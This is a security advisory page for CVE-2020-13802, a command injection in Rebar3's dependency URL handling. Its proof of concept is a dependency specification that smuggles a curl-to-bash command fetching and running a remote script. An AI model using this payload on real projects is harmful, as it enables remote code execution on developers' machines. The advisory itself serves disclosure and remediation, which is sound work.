Rebar3 3.13.2 Command Injection

2020.09.02
Credit: Alexey Pronin
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Rebar3 - OS command injection # Date: 2020-06-03 # Exploit Author: Alexey Pronin (vulnbe) # Vendor Homepage: https://rebar3.org # Software Link: https://github.com/erlang/rebar3 # Versions affected: 3.0.0-beta.3 - 3.13.2 # CVE: CVE-2020-13802 1. Description: ---------------------- Rebar3 versions 3.0.0-beta.3 to 3.13.2 are vulnerable to OS command injection via URL parameter of dependency specification. 2. Proof of Concept: ---------------------- * Add dependency with any of the following specification: { 'dephelper', ".*", { hg, "https://github.com/vulnbe/poc-rebar3-helper.git?repo=main&threadId=19:428af44abb014e318e7d225a4a88acc2@thread.tacv2&ctx=channel|curl\t-fsSL\thttps://gist.githubusercontent.com/vulnbe/6e5ec8fae3bdbee8e5f11f15c1462e48/raw/94616f0ee52935fda458c889d6f686958c79a2c8/poc.sh|bash\t-|git\tclone\thttps://github.com/vulnbe/poc-rebar3-helper.git", "dephelper"} } or { 'poc_rebar3', ".*", { git, "https://github.com/vulnbe/poc-rebar3.git" } } * Execute command: rebar3 clean References ---------------------- * [Rebar3 vulnerability analysis](https://vuln.be/post/rebar3-command-injection/) * [POC](https://github.com/vulnbe/poc-rebar3.git) * [Vulnerability remediation PR](https://github.com/erlang/rebar3/pull/2302) * [CVE-2020-13802](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13802)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top